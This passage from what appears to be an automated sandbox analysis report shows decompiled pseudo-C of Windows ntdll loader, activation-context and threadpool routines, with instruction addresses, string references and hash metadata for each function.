				_push( *((intOrPtr*)( *[fs:0x30] + 8)));
				_t150 = 3;
				_push(_t150);
				E04CBE580();
				_t154 = 2;
				_t83 =  *(_v280 + 0x5c) & 0x0000ffff;
				if(_t83 != _t150) {
					if(_t83 == _t154) {
						goto L2;
					}
					goto L18;
				}
				L2:
				_push(0x4c813b0);
				_push(_t150);
				_push( &_v268);
				_t85 = E04CF2AB0();
				_t151 = 4;
				if(_t85 >= 0) {
					_push( &_v256);
					_push(0x50);
					_push( &_v92);
					_push(_t154);
					_push(0x4c81a88);
					_push(_v268);
					_t88 = E04CF2B00();
					_push(_v292);
					E04CF2A80();
					if(_t88 < 0 || _v88 != _t151 || _v84 != _t151 || _v80 <= _t137) {
						_t154 = 2;
						goto L3;
					} else {
						L15:
						_t77 = _t137;
						goto L16;
					}
				}
				L3:
				_push(0x4da33b0);
				_push(0x20019);
				_v293 = _t137;
				_push( &_v288);
				_v288 = _t137;
				if(E04CF2AB0() >= 0) {
					_push( &_v284);
					_push(0x30);
					_push( &_v220);
					_push(_t154);
					_push(_v288);
					_t94 = E04CF2AF0();
					_push(_v308);
					_t156 = _t94;
					E04CF2A80();
					_t52 = _t156 + 0x7ffffffb; // 0x7ffffffb
					asm("sbb ecx, ecx");
					_t139 =  ~_t52 & _t94;
					if(( ~_t52 & _t94) < 0 || _v200 == _t137) {
						goto L4;
					} else {
						L26:
						if(E04CCDDA0(_t137, _t137, 0x4c81a78,  &_v264) >= 0) {
							_t158 = _v264;
							if(E04CCCF00(_t139, _t147, _t158, 0x4c81a90, _t137,  &_v280, _t137, _v0) < 0 || _v280 == _t137) {
								E04CCCD80(_t139, _t158);
								_t137 = 0xc0000139;
							} else {
								asm("ror eax, cl");
								 *0x4da5b64 =  *0x7ffe0330 ^ _v280;
								 *0x4da68e4 = _t158;
							}
						} else {
							_t137 = 0xc0000135;
						}
						goto L15;
					}
				}
				L4:
				_push(0x4c81398);
				_push(1);
				_push( &_v292);
				if(E04CF2AB0() < 0) {
					L7:
					if(E04CD3890(_t137,  &_v252) < 0) {
						goto L15;
					}
					_v276 = 0;
					_t102 = (_v252 & 0x0000ffff) + 0x78;
					if(_t102 > 0xfffe) {
						L14:
						E04CC3B90( &_v252);
						if(_v297 != _t137) {
							goto L26;
						}
						goto L15;
					}
					_t146 =  *0x4da5d78; // 0x0
					_t147 = _t102 & 0x0000ffff;
					_t139 = _t146 + 0x180000;
					_v274 = _t102 & 0x0000ffff;
					_t113 = E04CC5D90(_t146 + 0x180000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t146 + 0x180000, _t102 & 0x0000ffff);
					_v284 = _t113;
					if(_t113 == 0) {
						goto L14;
					}
					if(E04CD10D0(_t139,  &_v276,  &_v252) >= 0 && E04CBFE40(_t139,  &_v276, L"\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers") >= 0) {
						_v244 = 0x18;
						_v236 =  &_v276;
						_push( &_v244);
						_push(1);
						_v240 = _t137;
						_push( &_v292);
						_v232 = 0x40;
						_v228 = _t137;
						_v224 = _t137;
						if(E04CF2AB0() >= 0) {
							_push( &_v284);
							_push(0x50);
							_push( &_v172);
							_push(2);
							_push(0x4c81390);
							_push(_v292);
							_t127 = E04CF2B00();
							_push(_v316);
							E04CF2A80();
							if(_t127 >= 0 && _v168 == _t151 && _v164 == _t151 && _v160 > 1) {
								_v293 = 1;
							}
						}
					}
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t137, _v272);
					goto L14;
				} else {
					_push( &_v284);
					_push(0x50);
					_push( &_v172);
					_push(2);
					_push(0x4c81390);
					_push(_v292);
					if(E04CF2B00() >= 0) {
						if(_v168 == _t151 && _v164 == _t151 && _v160 > 1) {
							_v293 = 1;
							_push( &_v284);
							_push(0x50);
							_push( &_v172);
							_push(2);
							_push(0x4c81a80);
							_push(_v292);
							E04CF2B00();
						}
					}
					_push(_v292);
					E04CF2A80();
					if(_v297 != _t137) {
						goto L26;
					}
					goto L7;
				}
			}

0x04ce832a
0x04ce8337
0x04ce833f
0x04ce8343
0x04ce8347
0x04ce834b
0x04ce8351
0x04ce8515
0x04ce8515
0x04ce84f7
0x04ce84fe
0x04ce84ff
0x04ce8500
0x04ce850b
0x04ce850b
0x04ce835b
0x04ce8362
0x04ce8363
0x04ce8364
0x04ce8369
0x04ce836a
0x04ce836b
0x04ce8376
0x04ce8377
0x04ce837e
0x04ce850f
0x00000000
0x00000000
0x00000000
0x04ce850f
0x04ce8384
0x04ce8384
0x04ce8389
0x04ce838e
0x04ce838f
0x04ce8396
0x04ce8399
0x04d24eee
0x04d24eef
0x04d24ef8
0x04d24ef9
0x04d24efa
0x04d24eff
0x04d24f03
0x04d24f08
0x04d24f0e
0x04d24f15
0x04d24f38
0x00000000
0x04ce84f5
0x04ce84f5
0x04ce84f5
0x00000000
0x04ce84f5
0x04d24f15
0x04ce839f
0x04ce839f
0x04ce83a4
0x04ce83ad
0x04ce83b1
0x04ce83b2
0x04ce83bd
0x04d24f42
0x04d24f43
0x04d24f49
0x04d24f4a
0x04d24f4b
0x04d24f4f
0x04d24f54
0x04d24f58
0x04d24f5a
0x04d24f5f
0x04d24f67
0x04d24f69
0x04d24f6b
0x00000000
0x04d24f7b
0x04d24f7b
0x04d24f8e
0x04d25052
0x04d2506a
0x04d25093
0x04d25098
0x04d25072
0x04d25080
0x04d25082
0x04d25087
0x04d25087
0x04d24f94
0x04d24f94
0x04d24f94
0x00000000
0x04d24f8e
0x04d24f6b
0x04ce83c3
0x04ce83c3
0x04ce83c8
0x04ce83ce
0x04ce83db
0x04ce8413
0x04ce841f
0x00000000
0x00000000
0x04ce8427
0x04ce8431
0x04ce8439
0x04ce84e1
0x04ce84e6
0x04ce84ef
0x00000000
0x00000000
0x00000000
0x04ce84ef
0x04ce843f
0x04ce8445
0x04ce8448
0x04ce8456
0x04ce845e
0x04ce8463
0x04ce8469
0x00000000
0x00000000
0x04ce847c
0x04ce8495
0x04ce849d
0x04ce84a5
0x04ce84a6
0x04ce84ac
0x04ce84b0
0x04ce84b1
0x04ce84b9
0x04ce84bd
0x04ce84c8
0x04d24ff3
0x04d24ff4
0x04d24ffd
0x04d24ffe
0x04d25000
0x04d25001
0x04d25005
0x04d2500a
0x04d25010
0x04d25017
0x04d25045
0x04d25045
0x04d25017
0x04ce84c8
0x04ce84dc
0x00000000
0x04ce83dd
0x04ce83e1
0x04ce83e2
0x04ce83eb
0x04ce83ec
0x04ce83ee
0x04ce83ef
0x04ce83fa
0x04d24fa5
0x04d24fca
0x04d24fcf
0x04d24fd0
0x04d24fd9
0x04d24fda
0x04d24fdc
0x04d24fe1
0x04d24fe5
0x04d24fe5
0x04d24fa5
0x04ce8400
0x04ce8404
0x04ce840d
0x00000000
0x00000000
0x00000000
0x04ce840d

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 04CE847E
minkernel\ntdll\ldrinit.c, xrefs: 04CE8341
@, xrefs: 04CE84B1
LdrpInitializeProcess, xrefs: 04CE8342

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 2994545307-1918872054
Opcode ID: 481c298b0ce578549cd670a437a1eb8d74b99254e82417de22272d98ce762c22
Instruction ID: d42664bfc0d2dc55d2e2f8bc095bef3aabcf604887343644e8c5df7b3e969f0c
Opcode Fuzzy Hash: 481c298b0ce578549cd670a437a1eb8d74b99254e82417de22272d98ce762c22
Instruction Fuzzy Hash: 15916B71608340AFE721EF61CD50EBBB6EAFB84748F44492EFA8592150E734F944DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04CE265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x4dab370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x4c8120c) {
					E04D3EF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E04CF4B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E04D3EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E04CC3B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = E04CC5D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E04CE33D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E04CA9303(_t129);
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E04CC5D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E04CF88C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x04ce265c
0x04ce266e
0x04ce2675
0x04ce267b
0x04ce2685
0x04ce268b
0x04ce2691
0x04ce2697
0x04ce269b
0x04ce26a1
0x04ce26a8
0x04ce26aa
0x04ce26b3
0x04ce26b4
0x04ce26bb
0x04ce26be
0x04ce26c4
0x04ce26ca
0x04ce26d5
0x04d21ff1
0x04d21ff9
0x04ce2906
0x04ce2916
0x04ce2916
0x04ce26e1
0x04ce26e9
0x04ce26eb
0x04ce26eb
0x04ce26f3
0x04ce26fb
0x04ce26fd
0x04ce26fd
0x04ce2705
0x04ce270d
0x04ce270f
0x04ce270f
0x04ce271b
0x04d220a8
0x04d220ae
0x04d220b4
0x04d220b5
0x04d220c9
0x04d220d1
0x00000000
0x04ce2741
0x04ce2743
0x04ce2813
0x04ce283c
0x04ce283c
0x04ce283c
0x04ce2842
0x04ce2844
0x04ce2844
0x04ce284a
0x04ce2850
0x04ce2858
0x04ce28d2
0x04ce28d2
0x04ce28d4
0x04ce28d4
0x04ce28da
0x04ce28e4
0x04ce28e6
0x04ce28ee
0x04ce28f0
0x04ce28f0
0x04ce28f2
0x04ce28f4
0x04ce28f6
0x04d220e2
0x04d220e2
0x00000000
0x04ce28f6
0x04ce285d
0x04ce285f
0x04ce285f
0x04ce2863
0x04ce2869
0x04ce2871
0x04d2205d
0x00000000
0x04d2205d
0x04ce288e
0x04ce2892
0x04d22067
0x04d22080
0x04d22080
0x00000000
0x04d22080
0x04ce2898
0x04ce289b
0x04ce28a1
0x04ce28a6
0x04ce28aa
0x04d2207b
0x00000000
0x04d2207b
0x04ce28b0
0x04ce28ba
0x04ce28c0
0x04d2208d
0x04d2209e
0x04d2209e
0x04ce28c6
0x04ce28cc
0x04ce28cc
0x00000000
0x04ce2863
0x04ce281c
0x00000000
0x00000000
0x04ce2822
0x04ce2822
0x04ce2825
0x04ce2829
0x04d22003
0x00000000
0x04d22003
0x04ce2832
0x04ce2834
0x00000000
0x04ce2834
0x04ce2749
0x04ce274c
0x00000000
0x04ce275f
0x04ce2761
0x04d22014
0x00000000
0x00000000
0x04d2201a
0x04ce2767
0x04ce2767
0x04ce276d
0x04ce276f
0x04ce276f
0x04ce2775
0x04ce277b
0x04ce2783
0x00000000
0x00000000
0x04ce278c
0x04ce2791
0x04ce2797
0x00000000
0x00000000
0x04ce279d
0x04ce27a0
0x04ce27a5
0x04ce27a8
0x04ce27ab
0x04ce27ae
0x04ce27b4
0x04ce27b4
0x04ce27b9
0x04d22024
0x04d22033
0x04d22043
0x04d22045
0x04d2204d
0x04ce27d2
0x04ce27d5
0x04ce27e8
0x04ce27ee
0x04ce27fd
0x04ce27fe
0x04ce27ff
0x04ce2800
0x04ce2802
0x04ce2808
0x00000000
0x04ce2808
0x04d22053
0x00000000
0x04d22053
0x04d22026
0x00000000
0x04d22026
0x04ce27bf
0x04ce27c5
0x04ce27cc
0x00000000
0x04ce27cc
0x04ce274c

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 04D220C0
.Local, xrefs: 04CE27F8
SXS: %s() passed the empty activation context, xrefs: 04D21FE8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 04D21FE3, 04D220BB

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: f2fbec9b49d12cdfb332f3aa69a755bfbc69deb3e098eda18046cb40d229a5ed
Instruction ID: ea7879e4b41fe8c4bf852a0e9e24b883e0a51cd75e45997f94f70d44748c8023
Opcode Fuzzy Hash: f2fbec9b49d12cdfb332f3aa69a755bfbc69deb3e098eda18046cb40d229a5ed
Instruction Fuzzy Hash: B3A1B331A01229DBDB34CF55DD84BA9B3BABF58318F1541E9E908A7251D731BE81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04CB63CB Relevance: 5.2, Strings: 4, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04CB63CB(signed int __ecx) {
				signed int _v8;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t88;
				intOrPtr _t100;
				signed int _t121;
				void* _t122;
				signed char _t126;
				void* _t128;
				void* _t131;
				void* _t133;
				signed int _t136;
				signed int _t138;

				_t123 = __ecx;
				_t138 = (_t136 & 0xfffffff8) - 0x64;
				_t83 =  *0x4dab370 ^ _t138;
				_v8 =  *0x4dab370 ^ _t138;
				_t121 = __ecx;
				if(__ecx == 0) {
					L15:
					_pop(_t128);
					_pop(_t133);
					_pop(_t122);
					return E04CF4B50(_t83, _t122, _v8 ^ _t138, _t126, _t128, _t133);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v104 = 0;
					_v100 = 0;
					_t88 = E04CF8870( *[fs:0x18] + 0x19c,  &_v104, 8);
					_t138 = _t138 + 0xc;
					if(_t88 != 0) {
						_push(8);
						_push( &_v104);
						_push(0x2c);
						_push(0xfffffffe);
						if(E04CF2A60() >= 0) {
							_t123 =  *[fs:0x18];
							 *((intOrPtr*)(_t123 + 0x19c)) = _v104;
							 *((intOrPtr*)(_t123 + 0x1a0)) = _v100;
						}
					}
					if(( *(_t121 + 0x28) & 0x00000001) != 0) {
						if(( *(_t121 + 0x38) & 0x00000001) == 0) {
							_t123 = _t121;
							E04CCC700(_t121);
							 *(_t121 + 0x28) =  *(_t121 + 0x28) & 0x000000fe;
						}
					}
					if( *((intOrPtr*)(_t121 + 0x2c)) != 0) {
						if(( *(_t121 + 0x38) & 0x00000002) == 0) {
							E04CDF1F0(0);
							 *((intOrPtr*)(_t121 + 0x2c)) = 0;
						}
					}
					_t83 =  *(_t121 + 0x48);
					if(_t83 != 0 && ( *(_t83 + 0x10c) & 0x00000001) == 0) {
						_t83 =  *[fs:0x18];
						_t131 = 0x50;
						if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) != 0) {
							if(( *(_t121 + 0x38) & 0x00000004) == 0) {
								E04CF8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0xc;
								_v72 =  *((intOrPtr*)(_t121 + 0x30));
								_v68 =  *((intOrPtr*)(_t121 + 0x34));
								_push( &_v92);
								_v92 = 0xc0000710;
								_v76 = 2;
								L04D08A60(_t123, _t126);
								_push(4);
								_v100 = 0;
								_push( &_v100);
								_push(5);
								_push(0xfffffffe);
								_t83 = E04CF2A60();
							}
						}
						_t126 =  *(_t121 + 0x38);
						if((_t126 & 0x00000010) == 0 && E04CB6929() != 0) {
							_push( *((intOrPtr*)(_t121 + 0x34)));
							E04D3EF10(0x54, 0, "ThreadPool: callback %p(%p) returned with a transaction uncleared\n",  *((intOrPtr*)(_t121 + 0x30)));
							E04CF8F40( &_v92, 0, _t131);
							_t138 = _t138 + 0x20;
							_v92 = 0xc000071d;
							_v76 = 0;
							_push( &_v92);
							_t83 = L04D08A60(_t123, _t126);
							_t126 =  *(_t121 + 0x38);
						}
						if((_t126 & 0x00000020) == 0) {
							_t123 =  *[fs:0x18];
							_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xa0));
							_t83 =  *(_t100 + 0xc);
							if( *(_t100 + 0xc) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E04D3EF10(0x54, 0, "ThreadPool: callback %p(%p) returned with the loader lock held\n",  *((intOrPtr*)(_t121 + 0x30)));
								E04CF8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071e;
								_v76 = 0;
								_push( &_v92);
								_t83 = L04D08A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if((_t126 & 0x00000040) == 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xfb8)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E04D3EF10(0x54, 0, "ThreadPool: callback %p(%p) returned with preferred languages set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E04CF8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071f;
								_v76 = 0;
								_push( &_v92);
								_t83 = L04D08A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if(_t126 >= 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xf88)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E04D3EF10(0x54, 0, "ThreadPool: callback %p(%p) returned with background priorities set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E04CF8F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc0000720;
								_v76 = 0;
								_push( &_v92);
								_t83 = L04D08A60(_t123, _t126);
							}
						}
					}
					goto L15;
				}
			}

0x04cb63cb
0x04cb63d3
0x04cb63db
0x04cb63dd
0x04cb63e2
0x04cb63e8
0x04cb64d4
0x04cb64d8
0x04cb64d9
0x04cb64da
0x04cb64e5
0x04cb63ee
0x04cb640e
0x04cb6415
0x04cb6416
0x04cb6417
0x04cb641a
0x04cb641e
0x04cb6422
0x04cb6427
0x04cb642c
0x04d10d22
0x04d10d28
0x04d10d29
0x04d10d2b
0x04d10d34
0x04d10d3a
0x04d10d45
0x04d10d4f
0x04d10d4f
0x04d10d34
0x04cb6436
0x04d10d5e
0x04d10d64
0x04d10d66
0x04d10d6b
0x04d10d6b
0x04d10d5e
0x04cb643f
0x04d10d78
0x04d10d7f
0x04d10d84
0x04d10d84
0x04d10d78
0x04cb6445
0x04cb644a
0x04cb6459
0x04cb6461
0x04cb6468
0x04d10d90
0x04d10d9d
0x04d10da5
0x04d10da8
0x04d10daf
0x04d10db7
0x04d10db8
0x04d10dc0
0x04d10dc8
0x04d10dcd
0x04d10dd3
0x04d10dd7
0x04d10dd8
0x04d10dda
0x04d10ddc
0x04d10ddc
0x04d10d90
0x04cb646e
0x04cb6474
0x04d10de6
0x04d10df4
0x04d10e03
0x04d10e08
0x04d10e0b
0x04d10e17
0x04d10e1b
0x04d10e1c
0x04d10e21
0x04d10e21
0x04cb6486
0x04cb648e
0x04cb6495
0x04cb649b
0x04cb64a1
0x04d10e29
0x04d10e37
0x04d10e46
0x04d10e4b
0x04d10e4e
0x04d10e5a
0x04d10e5e
0x04d10e5f
0x04d10e64
0x04d10e64
0x04cb64a1
0x04cb64aa
0x04cb64ac
0x04cb64b8
0x04d10e6c
0x04d10e7a
0x04d10e89
0x04d10e8e
0x04d10e91
0x04d10e9d
0x04d10ea1
0x04d10ea2
0x04d10ea7
0x04d10ea7
0x04cb64b8
0x04cb64c0
0x04cb64c2
0x04cb64ce
0x04d10eaf
0x04d10ebd
0x04d10ecc
0x04d10ed1
0x04d10ed4
0x04d10ee0
0x04d10ee4
0x04d10ee5
0x04d10ee5
0x04cb64ce
0x04cb64c0
0x00000000
0x04cb644a

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 04D10EB5
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 04D10DEC
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 04D10E2F
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 04D10E72

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 2c0408cc05f1f5f3b4d394191e481d09bd3c1374dd92f52d7cceab8a0cfb50a4
Instruction ID: 056e3f45804916cff4867d19c4d050812965def03044ee2e42ebafe9314be0a1
Opcode Fuzzy Hash: 2c0408cc05f1f5f3b4d394191e481d09bd3c1374dd92f52d7cceab8a0cfb50a4
Instruction Fuzzy Hash: 1271E371A04704AFDB60EF10C884B977BAAEF84754F044869F9898B586D334F588DFE2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4C3D Relevance: 5.1, Strings: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E04CE4C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x4da65e4; // 0x75d4f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x4da5b24; // 0x2f11e20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x4da65e4; // 0x75d4f0e0
					 *0x4da91e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E04CB26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x4da37c0 & 0x00000003) != 0) {
								E04D2E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x4da37c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4da37c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
